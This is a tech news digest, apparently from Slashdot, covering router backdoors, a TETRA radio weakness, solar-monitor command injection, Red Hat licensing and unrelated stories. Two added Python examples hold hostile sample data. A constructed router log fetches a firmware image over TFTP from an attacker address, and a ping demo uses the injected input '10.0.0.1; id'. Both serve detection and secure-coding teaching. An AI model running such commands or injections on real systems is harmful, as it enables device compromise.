Security

For 'Cybersecurity Awareness Month' America's Cybersecurity Agency Shares Four Online Safety Tips (cisa.gov)

Since 2004 October has been designated "Cybersecurity Awareness Month" in America, "a collaborative effort between government and industry to enhance cybersecurity awareness, encourage actions by the public to reduce online risk and generate discussion on cyber threats on a national and global scale."

That's according to America's Cybersecurity and Infrastructure Security Agency (or CISA), the operational lead for federal cybersecurity and national coordinator for critical infrastructure security and resilience (specifically designed for collaboration and partnership). It's why the NSA is publicizing the ten most common cybersecurity misconfigurations in large organizations.

But in addition, for consumers CISA is introducing a new program this year that "promotes behavioral change across the Nation, with a particular focus on how individuals, families and small to medium-sized businesses can Secure Our World by focusing on the four critical actions..." In a video the director of America's cyberdefense agency calls them steps "that everyone can take to stay safe online."
  • Use Strong Passwords, "meaning long, random, and unique to each account. And use a password manager to generate and to save them."
  • Turn on Multi-Factor Authentication on All Accounts That Offer It. "You need more than a password on your most important accounts, like email, social media, and financial accounts."
  • Recognize and Report Phishing. "Be cautious of unsolicited emails, texts, or calls asking you for personal information, and don't click on links or open attachments from unknown sources."
  • Update Your Software. "In fact, enable automatic updates on your software, so the latest security patches just keep your devices continuously up-to-date."

The video ends by noting CISA is asking tech companies and software developers to create products that are "secure by design."

"And let's secure our families by ensuring that our loved ones know what to look for and how to stay safe online."


United States

US Nutrition Panel's Ties To Top Food Giants Revealed In New Report

Tom Perkins writes via The Guardian: Almost half of a federal government panel that helps develop US nutritional guidelines has significant ties to big agriculture, ultra-processed food companies, pharmaceutical companies and other corporate organizations with a significant stake in the process's outcome. The revelation is part of a new report from US Right to Know, a government transparency group that looked for ties to corporate interests among the 20-member panel of food and nutrition experts that makes recommendations for updating the US government's official dietary guidelines.

It found nine members had ties to Nestle, Pfizer, Coca-Cola, the National Egg Board and other prominent food lobby groups, among others. The findings raise questions about whether the panel is looking out for Americans' health or corporate profits, and "erodes confidence in dietary guidelines," said Gary Ruskin of US Right to Know. "Millions of Americans' lives are affected by this report and it's crucial that the report tell the truth to American people and it's not degraded into another sales pitch for big food and big pharma," he said. [...]

"The guidelines affect the entire US food system quite strongly," Ruskin said. US Right to Know scoured public records dating back five years for conflicts of interest among the 20 panel members. In addition to the nine it found with "high-risk conflicts of interest" and connections to the food and drug industry, it found four more members who have possible conflicts of interest. It applauded the agencies for appointing seven members who did not appear to have any conflicts. At least four panelists have connections to at least two companies each among Abbott, Novo Nordisk, the National Dairy Council, Eli Lilly and Weight Watchers International. One panel member has received about $240,000 in grant funding from Eli Lilly.
Security

Backdoored Firmware Lets China State Hackers Control Routers With 'Magic Packets' (arstechnica.com)

An anonymous reader quotes a report from Ars Technica: Hackers backed by the Chinese government are planting malware into routers that provides long-lasting and undetectable backdoor access to the networks of multinational companies in the US and Japan, governments in both countries said Wednesday. The hacking group, tracked under names including BlackTech, Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda, has been operating since at least 2010, a joint advisory published by government entities in the US and Japan reported. The group has a history of targeting public organizations and private companies in the US and East Asia. The threat actor is somehow gaining administrator credentials to network devices used by subsidiaries and using that control to install malicious firmware that can be triggered with "magic packets" to perform specific tasks.

The hackers then use control of those devices to infiltrate networks of companies that have trusted relationships with the breached subsidiaries. "Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network," officials wrote in Wednesday's advisory. "To extend their foothold across an organization, BlackTech actors target branch routers -- typically smaller appliances used at remote branch offices to connect to a corporate headquarters -- and then abuse the trusted relationship of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic, blending in with corporate network traffic, and pivoting to other victims on the same corporate network."

Most of Wednesday's advisory referred to routers sold by Cisco. In an advisory of its own, Cisco said the threat actors are compromising the devices after acquiring administrative credentials and that there's no indication they are exploiting vulnerabilities. Cisco also said that the hacker's ability to install malicious firmware exists only for older company products. Newer ones are equipped with secure boot capabilities that prevent them from running unauthorized firmware, the company said.
"It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete," the advisory stated. "For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH."

To detect and mitigate this threat, the advisory recommends administrators disable outbound connections on virtual teletype (VTY) lines, monitor inbound and outbound connections, block unauthorized outbound connections, restrict administration service access, upgrade to secure boot-capable devices, change compromised passwords, review network device logs, and monitor firmware changes for unauthorized alterations.
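The advisory's monitoring points (SSH reaching the router from unexpected sources, unauthorized bootloader or firmware image downloads, and reboots) can be turned into a small correlation check. The following is an added example, not code from the advisory, Cisco or Ars Technica: it parses a handful of constructed IOS-style syslog lines (the field layout and mnemonics are an approximation of real router logs, not captures), assumes a management subnet of 10.10.0.0/24 as the SSH allowlist, and flags the download-then-reload sequence that a firmware swap leaves behind.

```python
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample lines in an IOS-style syslog layout (not real captures). The
# mnemonics mirror common IOS ones but the exact field layout is an assumption.
SAMPLE_LOGS = """\
Oct 4 01:12:03 branch-rtr-1 12: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: netops] [Source: 10.10.0.5] [localport: 22] at 01:12:03 UTC Wed Oct 4 2023
Oct 4 01:13:10 branch-rtr-1 13: %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:show version
Oct 4 02:44:51 branch-rtr-1 14: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 203.0.113.77] [localport: 22] at 02:44:51 UTC Wed Oct 4 2023
Oct 4 02:46:02 branch-rtr-1 15: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:copy tftp://203.0.113.77/c800-universalk9.bin flash:
Oct 4 02:47:30 branch-rtr-1 16: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:boot system flash:c800-universalk9.bin
Oct 4 02:48:05 branch-rtr-1 17: %SYS-5-RELOAD: Reload requested by admin on vty0 (203.0.113.77). Reload Reason: Reload Command.
Oct 4 02:51:40 branch-rtr-1 18: %SYS-5-RESTART: System restarted --
"""

# Assumed allowlisted management subnet; any other SSH login source is suspicious.
MGMT_NET = ipaddress.ip_network("10.10.0.0/24")

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) \d+: "
    r"%(?P<mnemonic>[A-Z0-9_]+-\d-[A-Z0-9_]+): (?P<msg>.*)$"
)
SSH_LOGIN_RE = re.compile(r"\[user: (?P<user>[^\]]+)\] \[Source: (?P<src>[\d.]+)\] \[localport: (?P<port>\d+)\]")
CMD_RE = re.compile(r"logged command:(?P<cmd>.*)$")
IMAGE_FETCH_RE = re.compile(r"^copy\s+(tftp|ftp|https?|scp):\S*\s+(flash|bootflash|disk\d*):", re.I)
BOOT_CHANGE_RE = re.compile(r"^boot\s+system\b", re.I)
RELOAD_MNEMONICS = {"SYS-5-RELOAD", "SYS-5-RESTART"}


@dataclass
class Finding:
    host: str
    when: datetime
    rule: str
    detail: str


def parse_line(line: str, year: int = 2023):
    """Split one syslog line into (host, timestamp, mnemonic, message); None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return m["host"], when, m["mnemonic"], m["msg"]


def analyze(log_text: str, mgmt_net=MGMT_NET) -> list[Finding]:
    """Apply the advisory's monitoring points: SSH from unexpected sources,
    image downloads (and boot-image changes), and reboots."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, when, mnemonic, msg = parsed
        if mnemonic == "SEC_LOGIN-5-LOGIN_SUCCESS":
            m = SSH_LOGIN_RE.search(msg)
            if m and m["port"] == "22" and ipaddress.ip_address(m["src"]) not in mgmt_net:
                findings.append(Finding(host, when, "ssh-from-unexpected-source",
                                        f"user {m['user']} from {m['src']}"))
        elif mnemonic == "PARSER-5-CFGLOG_LOGGEDCMD":
            m = CMD_RE.search(msg)
            cmd = m["cmd"].strip() if m else ""
            if IMAGE_FETCH_RE.match(cmd):
                findings.append(Finding(host, when, "image-download", cmd))
            elif BOOT_CHANGE_RE.match(cmd):
                findings.append(Finding(host, when, "boot-image-change", cmd))
        elif mnemonic in RELOAD_MNEMONICS:
            findings.append(Finding(host, when, "reload", msg))
    return findings


def firmware_replacement_sequences(findings, window=timedelta(minutes=30)):
    """Correlate: an image download followed by a reload on the same host within
    `window` is the trace an unauthorized firmware swap leaves behind."""
    sequences = []
    reloads = [f for f in findings if f.rule == "reload"]
    for d in (f for f in findings if f.rule == "image-download"):
        for r in reloads:
            if r.host == d.host and timedelta(0) <= r.when - d.when <= window:
                sequences.append((d.host, d.when, r.when))
                break
    return sequences


if __name__ == "__main__":
    found = analyze(SAMPLE_LOGS)
    for f in found:
        print(f"{f.when:%H:%M:%S} {f.host} {f.rule}: {f.detail}")
    for host, t_dl, t_rl in firmware_replacement_sequences(found):
        print(f"ALERT {host}: image downloaded {t_dl:%H:%M:%S}, reloaded {t_rl:%H:%M:%S}")
```

The per-line rules are deliberately noisy on their own (a legitimate upgrade also downloads an image and reloads); the value is in the correlation plus the source check, which is why the advisory pairs firmware monitoring with restricting where administrative access may come from.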

Ars Technica notes: "The advisory didn't provide any indicators of compromise that admins can use to determine if they have been targeted or infected."
The Media

Can Philanthropy Save Local Newspapers? (washingtonpost.com)

70 million Americans live in a county without a newspaper, according to a 2022 report cited in this editorial by the Washington Post's editorial board:

Who's to blame? The internet, mostly. Whereas deep-pocketed advertisers formerly relied on newspapers to reach their customers, they took to the audience-targeting capabilities of Facebook or Google. Web-based marketplaces also siphoned newspapers' once-robust revenue from classified ads.
But the Post emphasizes one positive new development: "a large pile of cash." In an initiative announced this month, 22 donor organizations, including the Knight Foundation and the John D. and Catherine T. MacArthur Foundation, are teaming up to provide more than $500 million to boost local news over five years — an undertaking called Press Forward... The injection of more than a half-billion dollars is sure to help the quest for a durable and replicable business model.

The even bigger imperative, however, is to elevate local news on the philanthropic food chain so that national and hometown funders prioritize this pivotal American institution. Failure on this front places more pressure on public policy solutions, and government activism mixes poorly with independent journalism...

One of the goals for Press Forward, accordingly, is building out the infrastructure — "from legal support to membership programs" — relied upon by local news providers to deliver their product. Jim Brady, vice president of journalism at the Knight Foundation, says it's easier than ever for news entrepreneurs to launch a local site because they can plug into existing technologies hammered out by their predecessors — and there's more development work still to fund on this front.

So where to go from here? Local philanthropic interests across the country could take a cue from the Press Forward partners and invest in the news organizations down the street.

Electronic Frontier Foundation

'Public Resource' Wins 2012 Case. Judge Rules Posting Regulations Online is Fair Use (abajournal.com)

From an EFF announcement this week: Technical standards like fire and electrical codes developed by private organizations but incorporated into public law can be freely disseminated without any liability for copyright infringement, a federal appeals court ruled Tuesday.
The judge ruled that posting the materials constituted fair use — so the nonprofit group doing the posting won't be liable for copyright infringement. The American Bar Association Journal reports: The decision is a victory for public-domain advocate Carl Malamud and the group that he founded, Public.Resource.org. The group posts legal materials on its websites, including the standards developed by the three organizations that sued... "It has been over 10 years since plaintiffs filed suit in this case," said Malamud in a press release by the Electronic Frontier Foundation. "The U.S. Court of Appeals has found decisively in favor of the proposition that citizens must not be relegated to economy-class access to the law."
In 2012 Carl Malamud answered questions from Slashdot readers.

And now, finally, from the EFF's announcement: Tuesday's ruling by a three-judge panel of the U.S. Court of Appeals for the District of Columbia Circuit upholds the idea that our laws belong to all of us, and we should be able to find, read, and share them free of registration requirements, fees, and other roadblocks... "In a nation governed by the rule of law, private parties have no business controlling who can read, share, and speak the rules to which we are all subject," EFF Legal Director Corynne McSherry said. "We are pleased that the Court of Appeals upheld what other U.S. courts, including the Supreme Court, have said for almost 200 years: No one should control access to the law."
Or, as the EFF puts it on another page, "Copyright cannot trump the essential public interest..."

Thanks to long-time Slashdot reader schwit1 for sharing the news.
Security

Hackers Shut Down 2 of the World's Most Advanced Telescopes (space.com)

Some of the world's leading astronomical observatories have reported cyberattacks that have resulted in temporary shutdowns. Space.com reports: The National Science Foundation's National Optical-Infrared Astronomy Research Laboratory, or NOIRLab, reported that a cybersecurity incident that occurred on Aug. 1 has prompted the lab to temporarily halt operations at its Gemini North Telescope in Hawaii and Gemini South Telescope in Chile. Other, smaller telescopes on Cerro Tololo in Chile were also affected. "Our staff are working with cybersecurity experts to get all the impacted telescopes and our website back online as soon as possible and are encouraged by the progress made thus far," NOIRLab wrote in a statement on its website on Aug. 24.

It's unclear exactly what the nature of the cyberattacks was or where they originated. NOIRLab points out that because the investigation is still ongoing, the organization will be cautious about what information it shares about the intrusions. The cyberattacks on NOIRLab's facilities occurred just days before the United States National Counterintelligence and Security Center (NCSC) issued a bulletin (PDF) advising American space companies and research organizations about the threat of cyberattacks and espionage.

Foreign spies and hackers "recognize the importance of the commercial space industry to the U.S. economy and national security, including the growing dependence of critical infrastructure on space-based assets," the bulletin stated. "They see US space-related innovation and assets as potential threats as well as valuable opportunities to acquire vital technologies and expertise."

Open Source

Terraform By Hashicorp Forked To OpenTF (theregister.com)

"Terraform, arguably the most popular Infrastructure as Code product, has been forked after the parent company HashiCorp changed its license from the Mozilla Public License (MPL) to the Business Source License v1.1 (BSL)," writes long-time Slashdot reader ochinko. "Our view is that we're actually not the fork because we're just changing the name but it's the same project under the same license," Sebastian Stadil, co-founder and CEO of DevOps automation biz Scalr told The Register. "Our position is that the fork is actually HashiCorp that has forked its own projects under a different license." From the report: HashiCorp's decision to issue new licensing terms for its software follows a path trodden by numerous other organizations formed around open source projects to limit what competitors can do with project code. As the biz acknowledged in its statement about the transition, firms like Cockroach Labs, Confluent, Sentry, Couchbase, Elastic, MariaDB, MongoDB, and Redis Labs have similarly adopted less-permissive software licenses to create a barrier for competitors. You can see the OpenTF manifesto here.
Games

Lichess Will No Longer Cooperate With US Chess Federation, Saint Louis Chess Club (lichess.org)

In a lengthy blog post today, the open-source internet chess server, Lichess, announced they will formally end all cooperation with both the U.S. Chess Federation and Saint Louis University Chess Club (STLCC), citing two high-profile, sexual misconduct cases involving grandmasters Alejandro Ramirez and Timur Gareyev. Here's a brief summary of the issue: In February, chess commentator and author Jennifer Shahade publicly accused grandmaster Alejandro Ramirez of sexual misconduct. Her allegations sparked a swift and severe backlash against Ramirez, who was forced to resign from the Saint Louis Chess Club (STLCC), before being permanently banned by the United States Chess Federation (US Chess). The allegations also exposed apparent failures at US Chess and STLCC. Yet, neither organization has faced any serious scrutiny or accountability for their handling of the case.

And Ramirez is not the only one. According to interviews and documents reviewed by Lichess, one other prominent American grandmaster has also been accused of sexual misconduct by multiple women, raising further troubling questions about how chess organizations deal with such matters.

Lichess has decided to stop cooperating with both organizations due to serious concerns about their accountability. We will not provide them with support, and we will not advertise their events. Women and girls in chess already face an uphill battle. They deserve a safe and supportive environment. But too often, they encounter abuse, harassment or worse. And too often, they feel powerless to report it or seek justice. It's time to help break the silence.
Lichess urges US Chess and STLCC "to publicly acknowledge their past mistakes, be more open with the public, and hold those who engage in misconduct accountable."

While they acknowledge US Chess has taken some steps to improve its processes, Lichess said "both US Chess and STLCC have failed to demonstrate an important aspect of accountability -- a willingness to acknowledge and address past shortcomings." They added: "We do not think that reconciliation will be possible without this acknowledgement."
Oracle

Oracle, SUSE, and CIQ Go After Red Hat With the Open Enterprise Linux Association (zdnet.com)

In a groundbreaking move, CIQ, Oracle, and SUSE have come together to announce the formation of the Open Enterprise Linux Association (OpenELA). From a report: The goal of this new collaborative trade association is to foster "the development of distributions compatible with Red Hat Enterprise Linux (RHEL) by providing open and free enterprise Linux source code."

The inception of OpenELA is a direct response to Red Hat's recent alterations to RHEL source code availability. This new Delaware 501(c)(6) US nonprofit association will provide an open process for organizations to access source code. This will enable it to build RHEL-compatible distributions. The initiative underscores the importance of community-driven source code, which serves as a foundation for creating compatible distributions.

Mike McGrath, Red Hat's vice president of Red Hat Core Platforms, sparked this when he announced Red Hat would be changing how users can access RHEL's source code. For the non-Hatters among you, Core Platforms is the division in charge of RHEL. McGrath wrote, "CentOS Stream will now be the sole repository for public RHEL-related source code releases. For Red Hat customers and partners, source code will remain available via the Red Hat Customer Portal."

This made it much more difficult for RHEL clone vendors, such as AlmaLinux, Rocky Linux, and Oracle Linux, to create perfect RHEL variant distributions. AlmaLinux elected to try to work with Red Hat's new source code rules. Oracle restarted its old fighting ways with IBM/Red Hat; SUSE announced an RHEL-compatible distro fork plan; and Rocky Linux found new ways to obtain RHEL code. Now the last two, along with CIQ, which started Rocky Linux, have joined forces.

Privacy

Kenya Suspends Worldcoin Scans Over Security, Privacy, and Financial Concerns (techcrunch.com)

Kenya's Ministry of the Interior has issued a decree suspending Worldcoin enrollment in the country, citing concerns with the "authenticity and legality" of its activities in the areas of security, financial services and data protection. TechCrunch reports: The suspension covers both Worldcoin and "any other entity that may be similarly engaging the people of Kenya" and will remain in place until the authorities determine "the absence of any risks to the general public whatsoever." Up until today, Kenya had one of the largest collections of venues -- at least 18, according to the company's directory last week -- where you could visit an "Orb," as the company's spherical and mirrored iris scanners are called, "and verify your World ID." Now there is only one listed -- after Orb operators, overwhelmed by the huge turnout, shifted their stations on Sunday to Kenyatta International Convention Centre (KICC), a bigger ground in Kenya's capital that could accommodate the thousands of people streaming in.

"Relevant security, financial service and data protection agencies have commenced inquiries and investigations to establish the authenticity and legality of the aforesaid activities, and the safety and protection of the data being harvested, and how the harvesters intend to use the data," said Kithure Kindiki, Kenya's cabinet secretary for the ministry of interior and national administration.
The news comes amid separate reports that Worldcoin plans to expand its operations to sign up more users globally and allow other organizations to use its iris-scanning and identity-verifying technology.

Further reading: Sam Altman's Worldcoin Eyeball-Scanning Crypto Project Launches
The Internet

AWS To Start Charging For Public IPv4 Addresses (theregister.com)

Long-time Slashdot reader nairnr shares a report from The Register: Cloud giant AWS will start charging customers for public IPv4 addresses from next year, claiming it is forced to do this because of the increasing scarcity of these and to encourage the use of IPv6 instead. It is now four years since we officially ran out of IPv4 ranges to allocate, and since then, those wanting a new public IPv4 address have had to rely on address ranges being recovered, either from organizations that close down or those that return addresses they no longer require as they migrate to IPv6.

If Amazon's cloud division is to be believed, the difficulty in obtaining public IPv4 addresses has seen the cost of acquiring a single address rise by more than 300 percent over the past five years, and as we all know, the business is a little short of cash at the moment, so is having to pass these costs on to users. "This change reflects our own costs and is also intended to encourage you to be a bit more frugal with your use of public IPv4 addresses and to think about accelerating your adoption of IPv6 as a modernization and conservation measure," writes AWS Chief Evangelist Jeff Barr, on the company news blog.

The update will come into effect on February 1, 2024, when AWS customers will see a charge of $0.005 (half a cent) per IP address per hour for all public IPv4 addresses. These charges will apparently apply whether the address is attached to a service or not, and like many AWS charges, appear inconsequential at first glance but can mount up over time if a customer is using many of them. These charges will apply to all AWS services including EC2, Relational Database Service (RDS) database instances, Elastic Kubernetes Service (EKS) nodes, and will apply across all AWS regions, the company said. However, customers will not be charged for IP addresses that they own and bring to AWS using Amazon's BYOIP feature. AWS offers a free tier for EC2, and this will include 750 hours of public IPv4 address usage per month for the first 12 months, starting from the same date the charges do.

AI

Dell Is All In On Generative AI (theverge.com)

It isn't just software companies looking to enter the generative AI fray. Dell, the PC maker, is going all in on generative AI and offering hardware to run powerful models and a new platform to help organizations get started. From a report: The company released what it calls Dell Generative AI Solutions for clients to set up access to large language models and create generative AI projects. The company will offer new hardware setups, a managed service platform, and computers to run generative AI projects faster.

Dell is known for releasing laptops and monitors, but the company also produces server racks and other enterprise hardware. While the more public face of the AI arms race is between developers of large language models like Meta, OpenAI, and Google, another group of tech companies is looking into how to cash in on the technology. From hardware providers to cloud providers, everyone believes they need an AI service to keep up as clients want to add more AI capabilities to their businesses.

Security

Researchers Find 'Backdoor' in Encrypted Police and Military Radios (vice.com)

A group of cybersecurity researchers has uncovered what they believe is an intentional backdoor in encrypted radios used by police, military, and critical infrastructure entities around the world. The backdoor may have existed for decades, potentially exposing a wealth of sensitive information transmitted across them, according to the researchers. From a report: While the researchers frame their discovery as a backdoor, the organization responsible for maintaining the standard pushes back against that specific term, and says the standard was designed for export controls which determine the strength of encryption. The end result, however, is radios with traffic that can be decrypted using consumer hardware like an ordinary laptop in under a minute. "There's no other way in which this can function than that this is an intentional backdoor," Jos Wetzels, one of the researchers from cybersecurity firm Midnight Blue, told Motherboard in a phone call.

The research is the first public and in-depth analysis of the TErrestrial Trunked RAdio (TETRA) standard in the more than 20 years the standard has existed. Not all users of TETRA-powered radios use the specific encryption algorithm called TEA1 which is impacted by the backdoor. TEA1 is part of the TETRA standard approved for export to other countries. But the researchers also found other, multiple vulnerabilities across TETRA that could allow historical decryption of communications and deanonymization. TETRA-radio users in general include national police forces and emergency services in Europe; military organizations in Africa; and train operators in North America and critical infrastructure providers elsewhere.

Cellphones

Toronto Zoo Urges Visitors To Stop Showing Cellphone Videos To Gorillas (thestar.com)

An anonymous reader quotes a report from The Toronto Star: Nassir the gorilla, languid in the heat of a summer afternoon, sits just within reach of a faded sign taped to the glass of his enclosure at the Toronto Zoo, advising visitors not to share images on their cellphones with the swinging bachelor. "We've had a lot of members and guests that actually will put their phones up to the glass and show him videos," says Maria Franke, the zoo's director of wildlife conservation and welfare. "And Nassir is so into those videos. It was causing him to be distracted and not interacting with the other gorillas, and you know, being a gorilla. He was just so enthralled with gadgets and phones and the videos."

Gorillas, it seems, share more than just 98 per cent of our DNA. Zookeepers have discovered they can become every bit as interested in cellphones as the bipedal visitors who pay to see them. [...] Biologist Rob Laidlaw sees animal interest in technology as a manifestation of their need for stimulation -- a result of the boredom they experience in captivity. He says keeping such animals stimulated is a huge challenge, even for sanctuary organizations that provide sprawling enclosures. "They're looking for any opportunity they can find to engage intellectually," said Laidlaw, a chartered biologist and executive director of Zoocheck, an animal protection organization. Laidlaw says technology has its uses in zoos, but the emphasis needs to remain on providing as many animals as possible with environments that are as close to their native habitats as possible. "My fear is always that people see these things and think they're a panacea when in fact they're not. They're just one little tiny facet of relieving the boredom of animals."

As most teenagers do, Nassir seems to have grown out of his preoccupation with cellphones, says Franke. He is strongly bonded to his half-brother, Sadiki, who shares the zoo's rainforest habitat with him. "It's like Nassir was a little boy, all he wanted to do was sit in the basement and play games on the computer," said Franke. "I'm not really sure what the content of the videos was. Was it gorillas in the wild? I have no idea. Was it a cartoon? I have no idea. But obviously, there was something that was attracting him to it." But just in case he isn't quite over it, the note to the public remains up -- for now.

Privacy

Bangladesh Government Website Leaks Citizens' Personal Data (techcrunch.com)

A Bangladeshi government website leaked the personal information of citizens, including full names, phone numbers, email addresses and national ID numbers. TechCrunch reports: Viktor Markopoulos, a researcher who works for Bitcrack Cyber Security, said he accidentally discovered the leak on June 27, and shortly after contacted the Bangladeshi e-Government Computer Incident Response Team (CERT). He said the leak includes data of millions of Bangladeshi citizens. TechCrunch was able to verify that the leaked data is legitimate by using a portion to query a public search tool on the affected government website. By doing this, the website returned other data contained in the leaked database, such as the name of the person who applied to register, as well as -- in some cases -- the name of their parents. We attempted this with 10 different sets of data, which all returned correct data.

TechCrunch is not naming the government website because the data is still available online, according to Markopoulos, and we haven't heard back from any of the Bangladeshi government organizations that we emailed asking for comment and alerting them to the data exposure. In Bangladesh, every citizen aged 18 and older is issued a National Identity Card, which assigns a unique ID to every citizen. The card is mandatory and gives citizens access to several services, such as getting a driver's license, passport, buying and selling land, opening a bank account, and others.

Markopoulos said finding the data "was too easy." "It just appeared as a Google result and I wasn't even intending on finding it. I was Googling an SQL error and it just popped up as the second result," he told TechCrunch, referring to SQL, a language designed for managing data in a database. The exposure of email addresses, phone numbers and national ID card numbers is bad on its own, but Markopoulos said that having this type of information could also "be used in the web application to access, modify, and/or delete the applications as well as view the Birth Registration Record Verification."

Security

Actively Exploited Vulnerability Threatens Hundreds of Solar Power Stations (arstechnica.com)

An anonymous reader quotes a report from Ars Technica: Hundreds of Internet-exposed devices inside solar farms remain unpatched against a critical and actively exploited vulnerability that makes it easy for remote attackers to disrupt operations or gain a foothold inside the facilities. The devices, sold by Osaka, Japan-based Contec under the brand name SolarView, help people inside solar facilities monitor the amount of power they generate, store, and distribute. Contec says that roughly 30,000 power stations have introduced the devices, which come in various packages based on the size of the operation and the type of equipment it uses.

Searches on Shodan indicate that more than 600 of them are reachable on the open Internet. As problematic as that configuration is, researchers from security firm VulnCheck said Wednesday, more than two-thirds of them have yet to install an update that patches CVE-2022-29303, the tracking designation for a vulnerability with a severity rating of 9.8 out of 10. The flaw stems from the failure to neutralize potentially malicious elements included in user-supplied input, leading to remote attacks that execute malicious commands. Security firm Palo Alto Networks said last month the flaw was under active exploit by an operator of Mirai, an open source botnet consisting of routers and other so-called Internet of Things devices. The compromise of these devices could cause facilities that use them to lose visibility into their operations, which could result in serious consequences depending on where the vulnerable devices are used.
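The flaw is described above as a failure to neutralize user-supplied input before it reaches a command, the CWE class behind most command injections. As an added illustration (this is not SolarView's code, whose internals are not on the page, and the "ping a device" handler is an assumed stand-in for the kind of monitoring function such products expose), the following Python shows the generic shape of the bug beside a hardened version: an allowlist check on the target before it is used, and an argv list passed to the process without any shell.

```python
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 hostname label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_target(host: str) -> bool:
    """Allowlist check: accept only an IP literal or a DNS name built from valid labels."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    return all(_LABEL_RE.match(label) for label in host.split("."))


def ping_command_vulnerable(host: str) -> str:
    """The anti-pattern: untrusted input spliced into a string that is handed to a shell."""
    return f"ping -c 1 {host}"


def shell_words(cmd: str) -> list[str]:
    """Diagnostic only: tokenise a command the way a POSIX shell would, so that
    metacharacters such as ';' show up as separate tokens rather than part of the host."""
    return list(shlex.shlex(cmd, posix=True, punctuation_chars=True))


def ping_command_hardened(host: str) -> list[str]:
    """Validate first, then build an argv list; no shell ever interprets the value."""
    if not is_valid_target(host):
        raise ValueError(f"rejected target: {host!r}")
    return ["ping", "-c", "1", host]


def accepts(host: str) -> bool:
    """True if the hardened builder would accept this value."""
    try:
        ping_command_hardened(host)
        return True
    except ValueError:
        return False


def run_ping(host: str, timeout: float = 5.0) -> int:
    """Execute the hardened command without a shell (shell=False is the default) and
    return its exit status."""
    result = subprocess.run(ping_command_hardened(host), capture_output=True, timeout=timeout)
    return result.returncode


if __name__ == "__main__":
    tainted = "10.0.0.1; id"   # constructed hostile input for the demonstration
    print("vulnerable string:   ", ping_command_vulnerable(tainted))
    print("as a shell sees it:  ", shell_words(ping_command_vulnerable(tainted)))
    print("hardened accepts it? ", accepts(tainted))
    print("hardened argv:       ", ping_command_hardened("inverter-01.example.net"))
```

Both layers matter: the argv list alone stops shell interpretation, and the allowlist alone stops option-injection style surprises (a leading hyphen is rejected by the label rule), so the hardened builder keeps both rather than relying on escaping.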

"The fact that a number of these systems are Internet facing and that the public exploits have been available long enough to get rolled into a Mirai-variant is not a good situation," VulnCheck researcher Jacob Baines wrote. "As always, organizations should be mindful of which systems appear in their public IP space and track public exploits for systems that they rely on." Baines said that the same devices vulnerable to CVE-2022-29303 were also vulnerable to CVE-2023-23333, a newer command-injection vulnerability that also has a severity rating of 9.8. Although there are no known reports of it being actively exploited, exploit code has been publicly available since February. Incorrect descriptions for both vulnerabilities are one factor involved in the patch failures, Baines said. Both vulnerabilities indicate that SolarView versions 8.00 and 8.10 are patched against CVE-2022-29303 and CVE-2023-23333. In fact, the researcher said, only 8.10 is patched against the threats.

Red Hat Software

Red Hat Enterprise Linux Sources Will Now Be Available To Paying Customers Only (redhat.com) 143

"CentOS Stream will now be the sole repository for public RHEL-related source code releases..." Red Hat posted this week on its blog, arguing that "The engagement around CentOS Stream, the engineering levels of investment, and the new priorities we're addressing for customers and partners now make maintaining separate, redundant, repositories inefficient."

Long-time Slashdot reader slack_justyb notes this means patches and changes will now hit CentOS Stream before actually hitting RHEL, which "will make it difficult for other distributions such as Alma Linux, Rocky Linux, and Oracle Linux to provide assured binary compatibility as their only source now will be ahead of what RHEL is actually using."

"Some commentators are pointing out that it's possible to sign up for a free Red Hat Developer account, and obtain the source code legitimately that way," writes the Register. "This is perfectly true, but the problem is that the license agreement that you have to sign to get that account prevents you from redistributing the software." Hackaday notes that beyond the GPL v2 license on the kernel, Red Hat also has "an additional user agreement that terminates access to updates if the code is re-published."

Rocky Linux officially "remains confident in its ability to continue as a bug-for-bug compatible and freely available alternative to Red Hat Enterprise Linux, despite changes in accessibility."
While this decision does change the automation we use for building Rocky Linux, we have already created a short term mitigation and are developing the longer term strategy. There will be no disruption or change for any Rocky Linux users, collaborators, or partners... The project pledges to keep its promise to maintain the full life-span of support for Rocky 8 and 9, and to continue to produce future RHEL-compatible versions as long as the option remains, allowing organizations to maintain the flexibility, control, and freedom they rely upon for their critical infrastructure. This is the open source way.
Gregory Kurtzer, founder of the Rocky Linux project, calls Red Hat's move "a minor inconvenience for the Rocky Linux team," but with "no disruption to Rocky Linux users. Moving forward we are becoming even more stable, supported, and secure."

AlmaLinux also weighs in: Can you just use CentOS Stream sources?
No, we are committed to remaining a downstream RHEL clone, and using CentOS Stream sources would make us upstream of RHEL. CentOS Stream sources, while being upstream of RHEL, do not always include all patches and updates that are included in RHEL packages.

Is Red Hat trying to kill downstream clones?
We cannot speak to Red Hat's intentions, and can only point to the things they have said publicly. We have had an incredible working relationship with Red Hat through the life of AlmaLinux OS and we hope to see that continue.

AI

Consumer Group Calls On EU To Urgently Investigate 'The Risks of Generative AI' (techcrunch.com) 35

